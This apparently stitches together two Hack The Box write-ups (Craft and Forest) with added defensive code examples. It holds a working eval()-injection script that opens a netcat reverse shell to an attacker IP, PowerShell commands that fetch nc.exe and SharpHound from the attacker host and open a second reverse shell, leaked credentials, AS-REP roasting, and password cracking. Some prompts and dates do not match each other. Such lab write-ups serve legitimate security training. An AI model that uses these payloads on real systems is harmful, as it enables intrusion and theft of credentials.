I looked at the commit that contained the patch and immediately spotted the vulnerability:

https://gogs.craft.htb/Craft/craft-api/commit/c414b160578943acfe2e158e89409623f41da4c6

The 'patch' uses eval() to check whether the ABV value (whatever that is) is less than 1. eval() should never be used on user input, because a malicious attacker can use it to achieve RCE. At this point I knew I could get a shell if I had a valid username/password combination.
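To make the point concrete, an added example (my code, not the craft-api repository's) that puts an eval()-based ABV check next to a hardened one and runs both over constructed inputs; the function names and sample values are assumptions:

```python
"""Added example (not code from the craft-api repository): the ABV check described
above, once built on eval() like the 'patch', once hardened, run over constructed
inputs so the difference in what each accepts is visible."""
from decimal import Decimal, InvalidOperation


def abv_check_vulnerable(abv):
    """Same shape as the patch: evaluate the submitted value as Python, then compare.
    Any valid Python expression in the string is executed before the comparison."""
    return eval(abv) < 1  # deliberately unsafe, kept only for the comparison


def abv_check_safe(abv):
    """Hardened form: the value is data, never code.

    - only str/int/float accepted (JSON lists, dicts and bools are rejected up front)
    - parsed with Decimal, which accepts numeric literals only
    - NaN/Infinity rejected, then range-checked (ABV is a fraction in [0, 1))
    Raises ValueError otherwise, so the API handler can answer 400 without ever
    executing the input.
    """
    if isinstance(abv, bool) or not isinstance(abv, (str, int, float)):
        raise ValueError("abv must be a number")
    try:
        value = Decimal(str(abv).strip())
    except InvalidOperation:
        raise ValueError("abv must be a decimal number") from None
    if not value.is_finite():
        raise ValueError("abv must be a finite number")
    return Decimal(0) <= value < Decimal(1)


# Constructed inputs: a normal value, one that is too high, an expression that is
# not a number at all, and a non-finite literal.
SAMPLES = ["0.072", "1.5", "0.2 if True else 9", "NaN"]


def compare(samples=SAMPLES):
    """Return {input: (vulnerable_result, safe_result)}.
    'rejected' means the hardened check raised ValueError; 'error' means the
    eval()-based check raised (i.e. the input was run as code and failed)."""
    out = {}
    for s in samples:
        try:
            safe = abv_check_safe(s)
        except ValueError:
            safe = "rejected"
        try:
            vuln = abv_check_vulnerable(s)
        except Exception:
            vuln = "error"
        out[s] = (vuln, safe)
    return out


if __name__ == "__main__":
    for inp, (vuln, safe) in compare().items():
        print(f"{inp!r:>22}: eval-based -> {vuln!s:<6} hardened -> {safe}")
```

The third sample shows the problem in miniature: the eval()-based check happily runs the conditional expression and accepts the result, while the hardened check refuses it as not a number.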

Credentials and ‘Shell As Root’

After I started looking for credentials, it wasn't long before I found them. As it turned out, Dinesh had initially added a test script containing his credentials:

https://gogs.craft.htb/Craft/craft-api/commit/10e3ba4f0a09c778d7cec673f28d410b73455a86
response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)

Now that I had valid credentials, I wrote a simple script that spawns a reverse shell:

#!/usr/bin/env python

import requests
import json

response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
json_response = json.loads(response.text)
token =  json_response['token']

headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json'  }

print("Spawning a reverse shell on port 443...")
brew_dict = {}
brew_dict['abv'] = '__import__("os").system("nc 10.10.14.156 443 -e /bin/sh &") #'
brew_dict['name'] = 'bullshit'
brew_dict['brewer'] = 'bullshit'
brew_dict['style'] = 'bullshit'

json_data = json.dumps(brew_dict)
response = requests.post('https://api.craft.htb/api/brew/', headers=headers, data=json_data, verify=False)
print("Done!")

root@fury-battlestation:~/htb/blog/craft# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.156] from (UNKNOWN) [10.10.10.110] 45619
python -c 'import pty; pty.spawn("/bin/sh")'
/opt/app # whoami         
whoami
root
/opt/app # ls -lah /root
ls -lah /root
total 16
drwx------    1 root     root        4.0K Nov 10 11:16 .
drwxr-xr-x    1 root     root        4.0K Feb 10  2019 ..
-rw-------    1 root     root          21 Nov 10 11:16 .ash_history
drwx------    1 root     root        4.0K Feb  9  2019 .cache
/opt/app # ls -lah /home
ls -lah /home
total 8
drwxr-xr-x    2 root     root        4.0K Jan 30  2019 .
drwxr-xr-x    1 root     root        4.0K Feb 10  2019 ..
/opt/app #

The root was a lie! It took me some time, but I realised I was inside a Docker container.

GOGS Credentials & User

Since I was in the app's directory, I read the contents of dbtest.py to find the database credentials:

#!/usr/bin/env python
 
import pymysql
from craft_api import settings
 
# test connection to mysql database
 
connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)
 
try: 
    with connection.cursor() as cursor:
        sql = "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
        cursor.execute(sql)
        result = cursor.fetchone()
        print(result)
 
finally:
    connection.close()

The credentials are stored in craft_api/settings.py, so I displayed the contents of that file:

# Flask settings
FLASK_SERVER_NAME = 'api.craft.htb'
FLASK_DEBUG = False  # Do not use debug mode in production
 
# Flask-Restplus settings
RESTPLUS_SWAGGER_UI_DOC_EXPANSION = 'list'
RESTPLUS_VALIDATE = True
RESTPLUS_MASK_SWAGGER = False
RESTPLUS_ERROR_404_HELP = False
CRAFT_API_SECRET = 'hz66OCkDtv8G6D'
 
# database
MYSQL_DATABASE_USER = 'craft'
MYSQL_DATABASE_PASSWORD = 'qLGockJ6G2J75O'
MYSQL_DATABASE_DB = 'craft'
MYSQL_DATABASE_HOST = 'db'
SQLALCHEMY_TRACK_MODIFICATIONS = False

Then I connected to the database to see if there were credentials I could use:

/opt/app # python
Python 3.6.8 (default, Feb  6 2019, 01:56:13) 
[GCC 8.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pymysql
>>> from craft_api import settings
>>> connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
...                              user=settings.MYSQL_DATABASE_USER,
...                              password=settings.MYSQL_DATABASE_PASSWORD,
...                              db=settings.MYSQL_DATABASE_DB,
...                              cursorclass=pymysql.cursors.DictCursor)
>>> def exec_sql(sql):
...         cursor = connection.cursor()
...         cursor.execute(sql)
...         #result = cursor.fetchone()
...         result = cursor.fetchall()
...         print(result)
... 
>>> exec_sql("SHOW DATABASES;")
[{'Database': 'craft'}, {'Database': 'information_schema'}]
>>> exec_sql("SHOW TABLES")
[{'Tables_in_craft': 'brew'}, {'Tables_in_craft': 'user'}]
>>> exec_sql("SELECT * FROM user")
[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]
>>> 

The database contains the following credentials:

dinesh 4aUh0A8PbVJxgd
ebachman llJ77D8QFkLPQB
gilfoyle ZEU3N8WNM2rh4T

I tried them over SSH, but they didn't work. They did, however, work on the Gogs platform. Gilfoyle had another, private repository that looked interesting:

I clicked into the .ssh folder and saw the following SSH keys:

I downloaded these 2 keys and set the correct SSH permissions with chmod 600.

The key is protected with a passphrase. Luckily Gilfoyle reused his Gogs password, ZEU3N8WNM2rh4T, so I was able to connect to the machine:

root@kali:~/htb/craft/ssh# ssh gilfoyle@craft.htb -i id_rsa
The authenticity of host 'craft.htb (10.10.10.110)' can't be established.
ECDSA key fingerprint is SHA256:sFjoHo6ersU0f0BTzabUkFYHOr6hBzWsSK0MK5dwYAw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'craft.htb,10.10.10.110' (ECDSA) to the list of known hosts.


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Enter passphrase for key 'id_rsa': ZEU3N8WNM2rh4T
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gilfoyle@craft:~$ pwd
/home/gilfoyle
root@craft:/home/gilfoyle# cat user.txt
bbf4b0cadfa3d4e6d0914c9cd5a612d4
gilfoyle@craft:~$

Getting root

After getting the user flag, I remembered an interesting directory in the private repository named vault, so I checked it out:

After some googling I found the application's website.

Basically, the system uses token to grant access to services across machines. I also found a file named .vault-token in the user’s home directory, so I tried to see the token’s capabilities:

gilfoyle@craft:~$ cat ~/.vault-token 
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
gilfoyle@craft:~$ vault token capabilities f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
root
gilfoyle@craft:~$

With that token I logged in to Vault:

gilfoyle@craft:~$ vault login -address=https://vault.craft.htb:8200 token=f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                  Value
---                  -----
token                f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor       1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration       ∞
token_renewable      false
token_policies       ["root"]
identity_policies    []
policies             ["root"]
gilfoyle@craft:~$

Then I connected over SSH as root using Vault's one-time password (OTP) option:

gilfoyle@craft:~$ vault ssh -mode otp root@localhost
WARNING: No -role specified. Use -role to tell Vault which ssh role to use for
authentication. In the future, you will need to tell Vault which role to use.
For now, Vault will attempt to guess based on the API response. This will be
removed in the Vault 1.1.
Vault SSH: Role: "root_otp"
Vault could not locate "sshpass". The OTP code for the session is displayed
below. Enter this code in the SSH password prompt. If you install sshpass,
Vault can automatically perform this step for you.
OTP for the session is: 308a5ffa-89c3-7625-4f53-a4fb1b1a1841


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/

Password: 308a5ffa-89c3-7625-4f53-a4fb1b1a1841
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# pwd
/root
root@craft:~# cat root.txt 
831d64ef54d92c1af795daae28a11591
root@craft:~#

Author: Jacco Straathof

htb-forest-nl

As usual, first an nmap scan

root@kalivm:~/Forest# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.161
Starting Nmap 7.80 (https://nmap.org ) at 2020-01-06 11:47 CET
Nmap scan report for 10.10.10.161
Host is up (0.016s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-10-21 09:54:20Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49682/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
49913/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.67 seconds

There are already several interesting things in this result. First of all, this is a domain-joined system in the HTB.local domain. It exposes Kerberos, LDAP and SMB services to the outside world and looks like a domain controller. And last but not least, a WinRM port is open. This could be an attack similar to the approach I took a long time ago for the ‘Active’ machine on Hack The Box, combined with the WinRM attack on Heist!

First let’s try enum4linux to see if I can list some more information.

root@kalivm:~/Forest# enum4linux -a 10.10.10.161
Starting enum4linux v0.8.9 
 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.161
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
---snip---
 =========================================== 
|    Getting domain SID for 10.10.10.161    |
 =========================================== 
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
---snip---
 ============================= 
|    Users on 10.10.10.161    |
 ============================= 
---snip---
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
---snip---
 ==================================================== 
|    Password Policy Information for 10.10.10.161    |
 ==================================================== 
[+] Attaching to 10.10.10.161 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
    [+] HTB
    [+] Builtin
[+] Password Info for Domain: HTB
    [+] Minimum password length: 7
    [+] Password history length: 24
    [+] Maximum password age: 41 days 23 hours 53 minutes 
    [+] Password Complexity Flags: 000000
        [+] Domain Refuse Password Change: 0
        [+] Domain Password Store Cleartext: 0
        [+] Domain Password Lockout Admins: 0
        [+] Domain Password No Clear Change: 0
        [+] Domain Password No Anon Change: 0
        [+] Domain Password Complex: 0
    [+] Minimum password age: 1 day 4 minutes 
    [+] Reset Account Lockout Counter: 30 minutes 
    [+] Locked Account Duration: 30 minutes 
    [+] Account Lockout Threshold: None
    [+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
---snip---
 ============================== 
|    Groups on 10.10.10.161    |
 ============================== 
---snip---
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
[+] Getting domain group memberships:
Group 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$
---snip---
enum4linux complete on Mon Oct 21 12:05:29 2019

Enum4linux turns up many interesting things. First of all, I see that there are some users (sebastien, lucinda, andy, mark, santi) present, and a clear service account (svc-alfresco).
Furthermore, no password complexity seems to be enforced, which can mean easy-to-guess or easy-to-crack passwords. There also seems to be a Microsoft Exchange installation present, which is commonly known to be a major security risk if not properly configured! And a last line confirms the suspicion: Forest is indeed a member of the Domain Controllers group! So I started browsing the impacket tools and trying several, until I got to the GetNPUsers.py tool.

┌─[✗]─[puck@parrot-lt]─[~/htb/legacy/forrest]
└──╼ $python3 GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/sebastien
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

 


root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/lucinda
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for lucinda
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kalivm:~/Forest# GetNPUsers.py -dc-ip 10.10.10.161 -no-pass HTB/svc-alfresco
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007fb921555847d786b92084b72f6a2ac83d8843b33c5005e768208a7ede2e37663ce6891e080b45a11b361d0b5979e2eb9bf885f8e983ed21b4891559301dc693fc71d3eb2e7d8ec2b77b5668ec23ca4599bfddd3d9163325231d1933f50637cc8af4eba5f351dd703c91c2ded255ebec3d3629bbd0949ae1d5df267010acd0289440e255abe7955ce2c5658dd8ef83cc0eaccd84a1b293334edad0398cf78247cc275aaae85bba3f42f3de757ab726547d401f06cda2b8af5f9200d8f95f7001e

After trying it for several users, I finally got a TGT response for the user svc-alfresco that I could try cracking with John:

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $john forrest.hash --fork=4 -w=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads per process (8 total across 4 processes)
Node numbers 1-4 of 4 (fork)
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB)
4 1g 0:00:00:02 DONE (2022-09-06 12:12) 0.4504g/s 460108p/s 460108c/s 460108C/s s5210523..s3r10u55
1 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 488548p/s 488548c/s 488548C/s !)KAT9aim.ie168
Waiting for 3 children to terminate
2 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 485899p/s 485899c/s 485899C/s !)!\\.abygurl69
3 0g 0:00:00:07 DONE (2022-09-06 12:12) 0g/s 483932p/s 483932c/s 483932C/s !)&!@!^^^%.a6_123
Session completed
┌─[puck@parrot-lt]─[~/htb/forrest]

So apparently svc-alfresco’s password is s3rvice. All you have to do now is get the user hash and start escalating privileges.
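An added example, not part of this writeup: two small audit helpers in Python that split the hash header GetNPUsers.py produced above (the etype-23 layout) into its fields and, given userAccountControl values, list which accounts an unauthenticated client can request an AS-REP for. The flag values and etype numbers are the standard Windows/Kerberos constants; the account list and the truncated ciphertext are constructed sample data.

```python
"""Audit helpers for the AS-REP roasting step: which accounts are exposed
(pre-authentication disabled) and what the captured hash header reveals."""
import re

# userAccountControl flag values (Microsoft ADS_USER_FLAG_ENUM)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Kerberos encryption types as they appear in the second field of a
# $krb5asrep$ hash. Etype 23 (RC4-HMAC) uses the NT hash directly as its key,
# so offline guessing is far cheaper than for the AES types, whose keys are
# derived with PBKDF2 from the password and a salt.
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
WEAK_ETYPES = {23}

# Layout produced by impacket GetNPUsers.py for etype 23 (the one on this page):
# $krb5asrep$23$<user>@<REALM>:<16-byte checksum hex>$<ciphertext hex>
_ASREP23_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<cipher>[0-9a-fA-F]+)$"
)


def parse_asrep_hash(line: str) -> dict:
    """Split a $krb5asrep$23$ line into its fields.

    Returns etype, etype_name, user, realm, checksum, cipher_len (bytes) and
    weak_etype. Raises ValueError for any other layout.
    """
    m = _ASREP23_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ hash in the etype-23 layout")
    etype = int(m.group("etype"))
    cipher_hex = m.group("cipher")
    if len(cipher_hex) % 2:
        raise ValueError("ciphertext hex has odd length")
    return {
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum": m.group("checksum").lower(),
        "cipher_len": len(cipher_hex) // 2,
        "weak_etype": etype in WEAK_ETYPES,
    }


def find_roastable(accounts) -> list:
    """Return sAMAccountNames whose userAccountControl has DONT_REQUIRE_PREAUTH
    set and that are not disabled: exactly the accounts GetNPUsers.py probes."""
    hits = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if uac & UF_DONT_REQUIRE_PREAUTH and not uac & UF_ACCOUNTDISABLE:
            hits.append(acct["sAMAccountName"])
    return hits


# Constructed sample accounts (not pulled from the target): svc-alfresco has the
# flags of a roastable service account with a non-expiring password, lucinda is
# a normal account, old-svc is roastable but disabled and therefore harmless.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-alfresco",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "lucinda", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "old-svc",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
]

# Header of the hash from the writeup; the ciphertext is truncated to 32 bytes
# because only the header matters for this check.
SAMPLE_HASH = ("$krb5asrep$23$svc-alfresco@HTB:38ca5d56d9fb6fd3c11015cecd122482"
               "$e6e0c606ccf778924c3e4dc02f63f3bfeae8c4b67ea08044268db8bde81aa007")


if __name__ == "__main__":
    info = parse_asrep_hash(SAMPLE_HASH)
    print(f"{info['user']}@{info['realm']} etype {info['etype']} ({info['etype_name']}),"
          f" weak etype: {info['weak_etype']}")
    print("AS-REP roastable:", find_roastable(SAMPLE_ACCOUNTS))
```

With real data you would feed `find_roastable` the output of an LDAP query for `userAccountControl` and treat every hit as a finding, since the fix (re-enable pre-authentication, and move the account away from RC4) removes the step shown above entirely.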

┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir

Privilege Escalation

The next step is escalating privileges. After pressing CTRL-C once too often, I decided it was time to set up a simple fallback shell.

root@kalivm:~/Forest# ruby shell.rb
PS > mkdir sedje
PS > cd sedje
PS > IWR -uri http://10.10.15.64:8000/nc.exe -outfile nc.exe

PS > ./nc 10.10.15.64 9002 -e powershell.exe
root@kalivm:~/Forest# nc -nvlp 9002
Listening on 0.0.0.0 9002
Connection received on 10.10.10.161 50030
Windows PowerShell 
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\svc-alfresco\Documents\sedje>
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.ps1 -outfile SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> IWR -uri http://10.10.15.64:8000/SharpHound.exe -outfile SharpHound.exe
PS C:\Users\svc-alfresco\Documents\sedje> Import-Module .\SharpHound.ps1
PS C:\Users\svc-alfresco\Documents\sedje> Invoke-BloodHound -CollectionMethod All -LDAPUser svc-alfresco -LDAPPass s3rvice
PS C:\Users\svc-alfresco\Documents\sedje> dir

    Directory: C:\Users\svc-alfresco\Documents\sedje

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        10/25/2019   5:20 AM          12950 20191025120253_BloodHound.zip
-a----        10/25/2019   5:20 AM           9151 Rk9SRVNU.bin
-a----        10/25/2019   5:18 AM         751616 SharpHound.exe
-a----        10/25/2019   5:17 AM         886595 SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload SharpHound.exe
Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Documents\SharpHound.exe


Data: 1402196 bytes of 1402196 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ./SharpHound.exe All
2022-09-06T03:34:37.8848043-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2022-09-06T03:34:38.2441827-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:38.3847964-07:00|INFORMATION|Initializing SharpHound at 3:34 AM on 9/6/2022
2022-09-06T03:34:39.6035545-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2022-09-06T03:34:40.9785510-07:00|INFORMATION|Beginning LDAP search for htb.local
2022-09-06T03:34:41.4004375-07:00|INFORMATION|Producer has finished, closing LDAP channel
2022-09-06T03:34:41.4004375-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2022-09-06T03:35:11.4786322-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 47 MB RAM
2022-09-06T03:35:25.5255232-07:00|INFORMATION|Consumers finished, closing output channel
2022-09-06T03:35:25.5567715-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 49 MB RAM
2022-09-06T03:35:25.6661470-07:00|INFORMATION|Enumeration finished in 00:00:44.7682293
2022-09-06T03:35:25.7442762-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
117 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2022-09-06T03:35:25.7442762-07:00|INFORMATION|SharpHound Enumeration Completed at 3:35 AM on 9/6/2022! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir


Directory: C:\Users\svc-alfresco\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/6/2022 3:35 AM 18873 20220906033525_BloodHound.zip
-a---- 9/6/2022 3:35 AM 19538 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a---- 9/6/2022 3:29 AM 1051648 SharpHound.exe


*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20220906033525_BloodHound.zip
